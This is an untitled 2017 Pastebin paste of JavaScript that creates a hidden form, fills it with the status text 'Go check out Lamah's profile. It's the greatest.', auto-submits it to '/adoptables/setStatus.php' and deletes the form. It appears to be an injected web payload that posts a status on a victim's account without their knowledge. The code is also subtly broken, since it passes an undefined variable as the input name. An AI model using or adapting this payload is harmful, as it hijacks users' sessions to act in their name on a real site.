Advertisement
Guest User

Untitled

a guest
Jun 23rd, 2017
56
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.40 KB | None | 0 0
  1. var myForm = document.createElement("form");
  2. myForm.method="post" ;
  3. myForm.action = '/adoptables/setStatus.php';
  4.  
  5. var myInput = document.createElement("input") ;
  6. myInput.setAttribute("name", post) ;
  7. myInput.setAttribute("value", "Go check out Lamah's profile. It's the greatest.");
  8. myForm.appendChild(myInput) ;
  9.  
  10. document.body.appendChild(myForm);
  11. myForm.submit();
  12. document.body.removeChild(myForm);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement